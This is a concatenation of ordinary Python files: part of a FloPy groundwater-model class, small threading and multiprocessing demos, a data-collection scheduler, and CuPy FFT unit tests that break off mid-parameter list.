def set_version(self, version):
self.version = version.lower()
# check that this is a valid model version
if self.version not in list(self.version_types.keys()):
err = (
f"Error: Unsupported model version ({self.version}). "
"Valid model versions are:"
)
for v in list(self.version_types.keys()):
err += f" {v}"
raise Exception(err)
# set namefile heading
self.heading = (
f"# Name file for {self.version_types[self.version]}, "
f"generated by Flopy version {__version__}."
)
# set heading for each package
for p in self.get_package_list():
pak = self.get_package(p)
if hasattr(pak, "heading"):
pak._generate_heading()
return None
def change_model_ws(self, new_pth=None, reset_external=False):
"""
Change the model work space.
Parameters
----------
new_pth : str
Location of new model workspace. If this path does not exist,
it will be created. (default is None, which will be assigned to
the present working directory).
Returns
-------
val : list of strings
Can be used to see what packages are in the model, and can then
be used with get_package to pull out individual packages.
"""
if new_pth is None:
new_pth = os.getcwd()
if not os.path.exists(new_pth):
try:
print(f"\ncreating model workspace...\n {new_pth}")
os.makedirs(new_pth)
except:
raise OSError(f"{new_pth} not valid, workspace-folder")
# line = '\n{} not valid, workspace-folder '.format(new_pth) + \
# 'was changed to {}\n'.format(os.getcwd())
# print(line)
# new_pth = os.getcwd()
# --reset the model workspace
old_pth = self._model_ws
self._model_ws = new_pth
if self.verbose:
print(f"\nchanging model workspace...\n {new_pth}")
# reset the paths for each package
for pp in self.packagelist:
pp.fn_path = os.path.join(self.model_ws, pp.file_name[0])
# create the external path (if needed)
if (
hasattr(self, "external_path")
and self.external_path is not None
and not os.path.exists(
os.path.join(self._model_ws, self.external_path)
)
):
pth = os.path.join(self._model_ws, self.external_path)
os.makedirs(pth)
if reset_external:
self._reset_external(pth, old_pth)
elif reset_external:
self._reset_external(self._model_ws, old_pth)
return None
def _reset_external(self, pth, old_pth):
new_ext_fnames = []
for ext_file, output in zip(
self.external_fnames, self.external_output
):
# new_ext_file = os.path.join(pth, os.path.split(ext_file)[-1])
# this is a wicked mess
if output:
# new_ext_file = os.path.join(pth, os.path.split(ext_file)[-1])
new_ext_file = ext_file
else:
# fpth = os.path.abspath(os.path.join(old_pth, ext_file))
# new_ext_file = os.path.relpath(fpth, os.path.abspath(pth))
fdir = os.path.dirname(ext_file)
if fdir == "":
fpth = os.path.abspath(os.path.join(old_pth, ext_file))
else:
fpth = ext_file
ao = os.path.abspath(os.path.dirname(fpth))
ep = os.path.abspath(pth)
relp = os.path.relpath(ao, ep)
new_ext_file = os.path.join(relp, os.path.basename(ext_file))
new_ext_fnames.append(new_ext_file)
self.external_fnames = new_ext_fnames
@property
def model_ws(self):
return copy.deepcopy(self._model_ws)
def _set_name(self, value):
"""
Set model name
Parameters
----------
value : str
Name to assign to model.
"""
self.__name = str(value)
self.namefile = self.__name + "." + self.namefile_ext
for p in self.packagelist:
for i in range(len(p.extension)):
p.file_name[i] = self.__name + "." + p.extension[i]
p.fn_path = os.path.join(self.model_ws, p.file_name[0])
def __setattr__(self, key, value):
if key == "free_format_input":
# if self.bas6 is not None:
# self.bas6.ifrefm = value
super().__setattr__(key, value)
elif key == "name":
self._set_name(value)
elif key == "model_ws":
self.change_model_ws(value)
elif key == "sr" and value.__class__.__name__ == "SpatialReference":
warnings.warn(
"SpatialReference has been deprecated.",
category=DeprecationWarning,
)
if self.dis is not None:
self.dis.sr = value
else:
raise Exception(
"cannot set SpatialReference - ModflowDis not found"
)
elif key == "tr":
assert isinstance(
value, discretization.reference.TemporalReference
)
if self.dis is not None:
self.dis.tr = value
else:
raise Exception(
"cannot set TemporalReference - ModflowDis not found"
)
elif key == "start_datetime":
if self.dis is not None:
self.dis.start_datetime = value
self.tr.start_datetime = value
else:
raise Exception(
"cannot set start_datetime - ModflowDis not found"
)
else:
super().__setattr__(key, value)
def run_model(
self,
silent=False,
pause=False,
report=False,
normal_msg="normal termination",
):
"""
This method will run the model using subprocess.Popen.
Parameters
----------
silent : boolean
If True, suppress echoing of run information to the screen (default is False).
pause : boolean, optional
Pause upon completion (default is False).
report : boolean, optional
Save stdout lines to a list (buff) which is returned
by the method. (default is False).
normal_msg : str
Normal termination message used to determine if the
run terminated normally. (default is 'normal termination')
Returns
-------
(success, buff)
success : boolean
buff : list of lines of stdout
"""
return run_model(
self.exe_name,
self.namefile,
model_ws=self.model_ws,
silent=silent,
pause=pause,
report=report,
normal_msg=normal_msg,
)
def load_results(self):
print("load_results not implemented")
return None
def write_input(self, SelPackList=False, check=False):
"""
Write the input.
Parameters
----------
SelPackList : False or list of packages
"""
if check:
# run check prior to writing input
self.check(f=f"{self.name}.chk", verbose=self.verbose, level=1)
# reset the model to free_format if parameter substitution was
# performed on a model load
if self.parameter_load and not self.free_format_input:
if self.verbose:
print(
"\nResetting free_format_input to True to "
"preserve the precision of the parameter data."
)
self.free_format_input = True
if self.verbose:
print("\nWriting packages:")
if SelPackList == False:
for p in self.packagelist:
if self.verbose:
print(" Package: ", p.name[0])
# prevent individual package checks from running after
# model-level package check above
# otherwise checks are run twice
# or the model level check procedure would have to be split up
# or each package would need a check argument,
# or default for package level check would have to be False
try:
p.write_file(check=False)
except TypeError:
p.write_file()
else:
for pon in SelPackList:
for i, p in enumerate(self.packagelist):
if pon in p.name:
if self.verbose:
print(" Package: ", p.name[0])
try:
p.write_file(check=False)
except TypeError:
p.write_file()
break
if self.verbose:
print(" ")
# write name file
self.write_name_file()
# os.chdir(org_dir)
return
def write_name_file(self):
"""
Every model needs its own write_name_file method
"""
raise Exception(
"IMPLEMENTATION ERROR: writenamefile must be overloaded"
)
def set_model_units(self):
"""
Every model needs its own set_model_units method
"""
raise Exception(
"IMPLEMENTATION ERROR: set_model_units must be overloaded"
)
@property
def name(self):
"""
Get model name
Returns
-------
name : str
name of model
"""
return copy.deepcopy(self.__name)
def add_pop_key_list(self, key):
"""
Add a external file unit number to a list that will be used to remove
model output (typically binary) files from ext_unit_dict.
Parameters
----------
key : int
file unit number
Returns
-------
Examples
--------
"""
if key not in self.pop_key_list:
self.pop_key_list.append(key)
def check(self, f=None, verbose=True, level=1):
"""
Check model data for common errors.
Parameters
----------
f : str or file handle
String defining file name or file handle for summary file
of check method output. If a string is passed a file handle
is created. If f is None, check method does not write
results to a summary file. (default is None)
verbose : bool
Boolean flag used to determine if check method results are
written to the screen
level : int
Check method analysis level. If level=0, summary checks are
performed. If level=1, full checks are performed.
Returns
-------
None
Examples
--------
>>> import flopy
>>> m = flopy.modflow.Modflow.load('model.nam')
>>> m.check()
"""
# check instance for model-level check
chk = utils.check(self, f=f, verbose=verbose, level=level)
# check for unit number conflicts
package_units = {}
duplicate_units = {}
for p in self.packagelist:
for i in range(len(p.name)):
if p.unit_number[i] != 0:
if p.unit_number[i] in package_units.values():
duplicate_units[p.name[i]] = p.unit_number[i]
otherpackage = [
k
for k, v in package_units.items()
if v == p.unit_number[i]
][0]
duplicate_units[otherpackage] = p.unit_number[i]
if len(duplicate_units) > 0:
for k, v in duplicate_units.items():
chk._add_to_summary(
"Error", package=k, value=v, desc="unit number conflict"
)
else:
chk.passed.append("Unit number conflicts")
return self._check(chk, level)
def plot(self, SelPackList=None, **kwargs):
"""
Plot 2-D, 3-D, transient 2-D, and stress period list (MfList)
model input data
Parameters
----------
SelPackList : bool or list
List of packages to plot. If SelPackList=None all packages
are plotted. (default is None)
**kwargs : dict
filename_base : str
Base file name that will be used to automatically generate file
names for output image files. Plots will be exported as image
files if file_name_base is not None. (default is None)
file_extension : str
Valid matplotlib.pyplot file extension for savefig(). Only used
if filename_base is not None. (default is 'png')
mflay : int
MODFLOW zero-based layer number to return. If None, then all
layers will be included. (default is None)
kper : int
MODFLOW zero-based stress period number to return.
(default is zero)
key : str
MfList dictionary key. (default is None)
Returns
----------
axes : list
Empty list is returned if filename_base is not None. Otherwise
a list of matplotlib.pyplot.axis are returned.
See Also
--------
Notes
-----
Examples
--------
>>> import flopy
>>> ml = flopy.modflow.Modflow.load('test.nam')
>>> ml.plot()
"""
from flopy.plot import PlotUtilities
axes = PlotUtilities._plot_model_helper(
self, SelPackList=SelPackList, **kwargs
)
return axes
def to_shapefile(self, filename, package_names=None, **kwargs):
"""
Wrapper function for writing a shapefile for the model grid. If
package_names is not None, then search through the requested packages
looking for arrays that can be added to the shapefile as attributes
Parameters
----------
filename : string
name of the shapefile to write
package_names : list of package names (e.g. ["dis","lpf"])
Packages to export data arrays to shapefile. (default is None)
Returns
-------
None
Examples
--------
>>> import flopy
>>> m = flopy.modflow.Modflow()
>>> m.to_shapefile('model.shp', SelPackList)
"""
warnings.warn("to_shapefile() is deprecated. use .export()")
self.export(filename, package_names=package_names)
return
def run_model(
exe_name,
namefile,
model_ws="./",
silent=False,
pause=False,
report=False,
normal_msg="normal termination",
use_async=False,
cargs=None,
):
"""
This function will run the model using subprocess.Popen. It
communicates with the model's stdout asynchronously and reports
progress to the screen with timestamps
Parameters
----------
exe_name : str
Executable name (with path, if necessary) to run.
namefile : str
Namefile of model to run. The namefile must be the
filename of the namefile without the path. Namefile can be None
to allow programs that do not require a control file (name file)
to be passed as a command line argument.
model_ws : str
Path to the location of the namefile. (default is the
current working directory - './')
silent : boolean
If True, suppress echoing of run information to the screen (default is False).
pause : boolean, optional
Pause upon completion (default is False).
report : boolean, optional
Save stdout lines to a list (buff) which is returned
by the method. (default is False).
normal_msg : str or list
Normal termination message used to determine if the
run terminated normally. More than one message can be provided using
a list. (Default is 'normal termination')
use_async : boolean
Asynchronously read model stdout and report with timestamps. Good for
models that take a long time to run; not good for models that run
very quickly.
cargs : str or list of strings
additional command line arguments to pass to the executable.
Default is None
Returns
-------
(success, buff)
success : boolean
buff : list of lines of stdout
"""
success = False
buff = []
# convert normal_msg to a list of lower case str for comparison
if isinstance(normal_msg, str):
normal_msg = [normal_msg]
for idx, s in enumerate(normal_msg):
normal_msg[idx] = s.lower()
# Check to make sure that program and namefile exist
exe = which(exe_name)
if exe is None:
import platform
if platform.system() in "Windows":
if not exe_name.lower().endswith(".exe"):
exe = which(exe_name + ".exe")
if exe is None:
raise Exception(
f"The program {exe_name} does not exist or is not executable."
)
else:
if not silent:
print(
f"FloPy is using the following executable to run the model: {exe}"
)
if namefile is not None:
if not os.path.isfile(os.path.join(model_ws, namefile)):
raise Exception(
f"The namefile for this model does not exists: {namefile}"
)
# simple little function for the thread to target
def q_output(output, q):
for line in iter(output.readline, b""):
q.put(line)
# time.sleep(1)
# output.close()
# create a list of arguments to pass to Popen
argv = [exe_name]
if namefile is not None:
argv.append(namefile)
# add additional arguments to Popen arguments
if cargs is not None:
if isinstance(cargs, str):
cargs = [cargs]
for t in cargs:
argv.append(t)
# run the model with Popen
proc = Popen(argv, stdout=PIPE, stderr=STDOUT, cwd=model_ws)
if not use_async:
while True:
line = proc.stdout.readline().decode("utf-8")
if line == "" and proc.poll() is not None:
break
if line:
for msg in normal_msg:
if msg in line.lower():
success = True
break
line = line.rstrip("\r\n")
if not silent:
print(line)
if report:
buff.append(line)
else:
break
return success, buff
# some tricks for the async stdout reading
q = Queue.Queue()
thread = threading.Thread(target=q_output, args=(proc.stdout, q))
thread.daemon = True
thread.start()
failed_words = ["fail", "error"]
last = datetime.now()
lastsec = 0.0
while True:
try:
line = q.get_nowait()
except Queue.Empty:
pass
else:
if line == "":
break
line = line.decode().lower().strip()
if line != "":
now = datetime.now()
dt = now - last
tsecs = dt.total_seconds() - lastsec
line = f"(elapsed:{tsecs})-->{line}"
lastsec = tsecs + lastsec
buff.append(line)
if not silent:
print(line)
for fword in failed_words:
if fword in line:
success = False
break
if proc.poll() is not None:
break
proc.wait()
thread.join(timeout=1)
buff.extend(proc.stdout.readlines())
proc.stdout.close()
for line in buff:
for msg in normal_msg:
if msg in line.lower():
print("success")
success = True
break
if pause:
input("Press Enter to continue...")
return success, buff
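# Illustrative usage sketch (not part of flopy): the executable and namefile
# below are placeholders; run_model only requires an executable reachable on
# the PATH and a namefile located in model_ws.
def _example_run():  # hypothetical helper, never called by the library
    success, buff = run_model(
        "mf2005",            # assumed MODFLOW executable name
        "model.nam",         # assumed namefile inside model_ws
        model_ws="./model_dir",
        report=True,         # collect stdout lines in buff
    )
    if not success:
        print("\n".join(buff))
    return success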
|
example1.py
|
import threading
import random
import time
def update():
global counter
current_counter = counter # reading in shared resource
time.sleep(random.randint(0, 1)) # simulating heavy calculations
counter = current_counter + 1 # updating shared resource
counter = 0
threads = [threading.Thread(target=update) for i in range(20)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
print(f"Final counter: {counter}.")
print("Finished.")
|
collect.py
|
# taaraxtak
# nick merrill
# 2021
#
# collect.py - schedules the data collectors.
# This runs continuously.
import time
import schedule
import threading
import logging
from funcy import partial
from src.shared.utils import configure_logging
from src.w3techs.collect import collect as w3techs_collect
from src.ooni.collect import collect as ooni_collect
from config import config
def run_threaded(job_func):
job_thread = threading.Thread(target=job_func)
job_thread.start()
#
# setup
#
configure_logging()
logger = logging.getLogger("taaraxtak:collect")
# connect to the db
postgres_config = config['postgres']
# configure scrapers for the db
w3techs = partial(w3techs_collect, postgres_config)
ooni = partial(ooni_collect, postgres_config)
#
# run
#
schedule.every().day.at('09:00').do(run_threaded, w3techs)
schedule.every(10).minutes.do(run_threaded, ooni)
while 1:
schedule.run_pending()
time.sleep(1)
|
process&thread_basics.py
|
from multiprocessing import Process
import time, os, threading
from threading import Thread
def learn(s):
print(f'Studying {s}..., process id: {os.getpid()}, thread: {threading.current_thread()}')
time.sleep(5)
print(f'Finished studying {s}, process id: {os.getpid()}, thread: {threading.current_thread()}')
class_list = ['Optimization', 'Stochastic Models', 'Financial Derivatives', 'Investment Science',
'Introduction of Chinese Financial Market']
def multi_processes_example():
plist = []
for c in class_list:
# create a process
p = Process(target=learn, args=(c,))
# start the process
p.start()
# add the created process to the list
plist.append(p)
[p.join() for p in plist]
def multi_threads_example():
tlist = []
for i in class_list:
# create a thread
t = Thread(target=learn, args=(i,))
# start the thread
t.start()
# add the created thread to the list
tlist.append(t)
[t.join() for t in tlist]
# multi_processes_example()
# multi_threads_example()
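# If the calls above are re-enabled, they should sit under a main guard: with
# the "spawn" start method (Windows, newer macOS) each child process
# re-imports this module, and unguarded top-level Process creation would fail
# during bootstrapping.  A minimal sketch:
if __name__ == '__main__':
    multi_processes_example()
    multi_threads_example()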
|
test_fft.py
|
import functools
import unittest
import pytest
import numpy as np
import cupy
from cupy import testing
from cupy.fft import config
from cupy.fft.fft import _default_fft_func, _fft, _fftn
def nd_planning_states(states=[True, False], name='enable_nd'):
"""Decorator for parameterized tests with and wihout nd planning
Tests are repeated with config.enable_nd_planning set to True and False
Args:
states(list of bool): The boolean cases to test.
name(str): Argument name to which the planning state is passed.
This decorator adds a keyword argument specified by ``name``
to the test fixture. Then, it runs the fixture once for each
element of ``states``, passing it to the named
argument.
"""
def decorator(impl):
@functools.wraps(impl)
def test_func(self, *args, **kw):
# get original global planning state
planning_state = config.enable_nd_planning
try:
for nd_planning in states:
try:
# enable or disable nd planning
config.enable_nd_planning = nd_planning
kw[name] = nd_planning
impl(self, *args, **kw)
except Exception:
print(name, 'is', nd_planning)
raise
finally:
# restore original global planning state
config.enable_nd_planning = planning_state
return test_func
return decorator
def _size_last_transform_axis(shape, s, axes):
if s is not None:
if s[-1] is not None:
return s[-1]
elif axes is not None:
return shape[axes[-1]]
return shape[-1]
@testing.parameterize(*testing.product({
'n': [None, 0, 5, 10, 15],
'shape': [(10,), (10, 10)],
'norm': [None, 'ortho', ''],
}))
@testing.gpu
@testing.with_requires('numpy>=1.10.0')
class TestFft(unittest.TestCase):
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.fft(a, n=self.n, norm=self.norm)
# np.fft.fft always returns np.complex128
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
# NumPy 1.17.0 and 1.17.1 raise ZeroDivisionError due to a bug
@testing.with_requires('numpy!=1.17.0')
@testing.with_requires('numpy!=1.17.1')
def test_ifft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.ifft(a, n=self.n, norm=self.norm)
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.parameterize(*testing.product({
'shape': [(10, 10), (10, 5, 10)],
'data_order': ['F', 'C'],
'axis': [0, 1, -1],
}))
@testing.gpu
@testing.with_requires('numpy>=1.10.0')
class TestFftOrder(unittest.TestCase):
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
if self.data_order == 'F':
a = xp.asfortranarray(a)
out = xp.fft.fft(a, axis=self.axis)
# np.fft.fft always returns np.complex128
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_ifft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
if self.data_order == 'F':
a = xp.asfortranarray(a)
out = xp.fft.ifft(a, axis=self.axis)
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.gpu
class TestDefaultPlanType(unittest.TestCase):
@nd_planning_states()
def test_default_fft_func(self, enable_nd):
# test cases where nd CUFFT plan is possible
ca = cupy.ones((16, 16, 16))
for axes in [(0, 1), (1, 2), None, (0, 1, 2)]:
fft_func = _default_fft_func(ca, axes=axes)
if enable_nd:
assert fft_func is _fftn
else:
assert fft_func is _fft
# only a single axis is transformed -> 1d plan preferred
for axes in [(0, ), (1, ), (2, )]:
assert _default_fft_func(ca, axes=axes) is _fft
# non-contiguous axes -> nd plan not possible
assert _default_fft_func(ca, axes=(0, 2)) is _fft
# >3 axes transformed -> nd plan not possible
ca = cupy.ones((2, 4, 6, 8))
assert _default_fft_func(ca) is _fft
# first or last axis not included -> nd plan not possible
assert _default_fft_func(ca, axes=(1, )) is _fft
@testing.gpu
@testing.slow
class TestFftAllocate(unittest.TestCase):
def test_fft_allocate(self):
# Check CuFFTError is not raised when the GPU memory is enough.
# See https://github.com/cupy/cupy/issues/1063
# TODO(mizuno): Simplify "a" after memory compaction is implemented.
a = []
for i in range(10):
a.append(cupy.empty(100000000))
del a
b = cupy.empty(100000007, dtype=cupy.float32)
cupy.fft.fft(b)
# Free huge memory for slow test
del b
cupy.get_default_memory_pool().free_all_blocks()
@testing.parameterize(
{'shape': (3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, None), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, 5), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-2, -1), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-1, -2), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (0,), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, None), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, 10), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-3, -2, -1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -2, -3), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (0, 1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': (2, 3), 'axes': (0, 1, 2), 'norm': 'ortho'},
{'shape': (2, 3, 4, 5), 's': None, 'axes': None, 'norm': None},
)
@testing.gpu
@testing.with_requires('numpy>=1.10.0')
class TestFft2(unittest.TestCase):
@nd_planning_states()
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fft2(self, xp, dtype, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.fft2(a, s=self.s, norm=self.norm)
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@nd_planning_states()
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_ifft2(self, xp, dtype, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.ifft2(a, s=self.s, norm=self.norm)
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.parameterize(
{'shape': (3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, None), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, 5), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-2, -1), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-1, -2), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': [-1, -2], 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (0,), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, None), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, 10), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-3, -2, -1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -2, -3), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -3), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (0, 1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': (2, 3), 'axes': (0, 1, 2), 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': (4, 3, 2), 'axes': (2, 0, 1), 'norm': 'ortho'},
{'shape': (2, 3, 4, 5), 's': None, 'axes': None, 'norm': None},
)
@testing.gpu
@testing.with_requires('numpy>=1.10.0')
class TestFftn(unittest.TestCase):
@nd_planning_states()
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fftn(self, xp, dtype, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.fftn(a, s=self.s, axes=self.axes, norm=self.norm)
if self.axes is not None and not self.axes:
assert out is a
return out
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@nd_planning_states()
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_ifftn(self, xp, dtype, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.ifftn(a, s=self.s, axes=self.axes, norm=self.norm)
if self.axes is not None and not self.axes:
assert out is a
return out
if xp == np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.parameterize(
{'shape': (3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, 5), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-2, -1), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-1, -2), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (0,), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, 10), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-3, -2, -1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -2, -3), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (0, 1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': (2, 3), 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': (2, 3), 'axes': (0, 1, 2), 'norm': 'ortho'},
)
@testing.gpu
@testing.with_requires('numpy>=1.10.0')
class TestPlanCtxManagerFftn(unittest.TestCase):
@nd_planning_states()
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fftn(self, xp, dtype, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
if xp == cupy:
from cupyx.scipy.fftpack import get_fft_plan
plan = get_fft_plan(a, self.s, self.axes)
with plan:
out = xp.fft.fftn(a, s=self.s, axes=self.axes, norm=self.norm)
else:
out = xp.fft.fftn(a, s=self.s, axes=self.axes, norm=self.norm)
if xp == np and dtype is np.complex64:
out = out.astype(np.complex64)
return out
@nd_planning_states()
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_ifftn(self, xp, dtype, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
if xp == cupy:
from cupyx.scipy.fftpack import get_fft_plan
plan = get_fft_plan(a, self.s, self.axes)
with plan:
out = xp.fft.ifftn(a, s=self.s, axes=self.axes, norm=self.norm)
else:
out = xp.fft.ifftn(a, s=self.s, axes=self.axes, norm=self.norm)
if xp == np and dtype is np.complex64:
out = out.astype(np.complex64)
return out
@nd_planning_states()
@testing.for_complex_dtypes()
def test_fftn_error_on_wrong_plan(self, dtype, enable_nd):
# This test ensures the context manager plan is picked up
from cupyx.scipy.fftpack import get_fft_plan
from cupy.fft import fftn
assert config.enable_nd_planning == enable_nd
# can't get a plan, so skip
if self.axes is not None:
if self.s is not None:
if len(self.s) != len(self.axes):
return
elif len(self.shape) != len(self.axes):
return
a = testing.shaped_random(self.shape, cupy, dtype)
bad_in_shape = tuple(2*i for i in self.shape)
if self.s is None:
bad_out_shape = bad_in_shape
else:
bad_out_shape = tuple(2*i for i in self.s)
b = testing.shaped_random(bad_in_shape, cupy, dtype)
plan_wrong = get_fft_plan(b, bad_out_shape, self.axes)
with pytest.raises(ValueError) as ex, plan_wrong:
fftn(a, s=self.s, axes=self.axes, norm=self.norm)
# targeting a particular error
assert 'The CUFFT plan and a.shape do not match' in str(ex.value)
@testing.parameterize(*testing.product({
'n': [None, 5, 10, 15],
'shape': [(10,), ],
'norm': [None, 'ortho'],
}))
@testing.gpu
@testing.with_requires('numpy>=1.10.0')
class TestPlanCtxManagerFft(unittest.TestCase):
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
if xp == cupy:
from cupyx.scipy.fftpack import get_fft_plan
shape = (self.n,) if self.n is not None else None
plan = get_fft_plan(a, shape=shape)
assert isinstance(plan, cupy.cuda.cufft.Plan1d)
with plan:
out = xp.fft.fft(a, n=self.n, norm=self.norm)
else:
out = xp.fft.fft(a, n=self.n, norm=self.norm)
# np.fft.fft always returns np.complex128
if xp == np and dtype is np.complex64:
out = out.astype(np.complex64)
return out
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_ifft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
if xp == cupy:
from cupyx.scipy.fftpack import get_fft_plan
shape = (self.n,) if self.n is not None else None
plan = get_fft_plan(a, shape=shape)
assert isinstance(plan, cupy.cuda.cufft.Plan1d)
with plan:
out = xp.fft.ifft(a, n=self.n, norm=self.norm)
else:
out = xp.fft.ifft(a, n=self.n, norm=self.norm)
if xp == np and dtype is np.complex64:
out = out.astype(np.complex64)
return out
@testing.for_complex_dtypes()
def test_fft_error_on_wrong_plan(self, dtype):
# This test ensures the context manager plan is picked up
from cupyx.scipy.fftpack import get_fft_plan
from cupy.fft import fft
a = testing.shaped_random(self.shape, cupy, dtype)
bad_shape = tuple(5*i for i in self.shape)
b = testing.shaped_random(bad_shape, cupy, dtype)
plan_wrong = get_fft_plan(b)
assert isinstance(plan_wrong, cupy.cuda.cufft.Plan1d)
with pytest.raises(ValueError) as ex, plan_wrong:
fft(a, n=self.n, norm=self.norm)
# targeting a particular error
assert 'Target array size does not match the plan.' in str(ex.value)
@testing.parameterize(
{'shape': (3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-2, -1), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-1, -2), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (0,), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': (1, 4, None), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, 10), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-3, -2, -1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -2, -3), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (0, 1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
